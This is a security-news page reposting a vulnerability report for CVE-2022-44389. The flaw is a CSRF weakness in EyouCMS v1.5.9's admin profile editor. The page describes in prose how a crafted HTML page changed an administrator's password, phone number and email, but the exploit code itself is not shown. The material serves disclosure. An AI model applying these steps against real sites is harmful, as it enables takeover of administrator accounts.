Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44389: EyouCMS v1.5.9 has a vulnerability, Cross-site request forgery(CSRF) · Issue #30 · weng-xianhu/eyoucms

EyouCMS V1.5.9-UTF8-SP1 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Edit Admin Profile module. This vulnerability allows attackers to arbitrarily change Administrator account information.

CVE
#csrf#vulnerability#web

EyouCMS v1.5.9 has a vulnerability, Cross-site request forgery(CSRF).Located in the background, edit the administrator profile. This vulnerability may cause the modification of personal information such as administrator password, mobile phone number, and email address. To exploit this vulnerability, a constructed HTML file needs to be opened.
1、Go to the back office - > personal information

The password is “admin123456”
2、Construct a request package to change passwords, mobile phone numbers, email addresses, and other basic information.

The above figure shows the constructed web page code, using CSRF to change its password to "csrftest", the mobile phone number to "11111111111", and the email address to "123@csrf.test".
3、View the administrator’s profile:

At this time, the administrator password is "admin123456", and other information is shown in the preceding figure.
4、Click on the constructed web page.

Return to the backend page to view the administrator’s profile.

Successfully used CSRF to modify mobile phone number and email address.
Verify that the password is changed to "csrftest":

Login successful!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda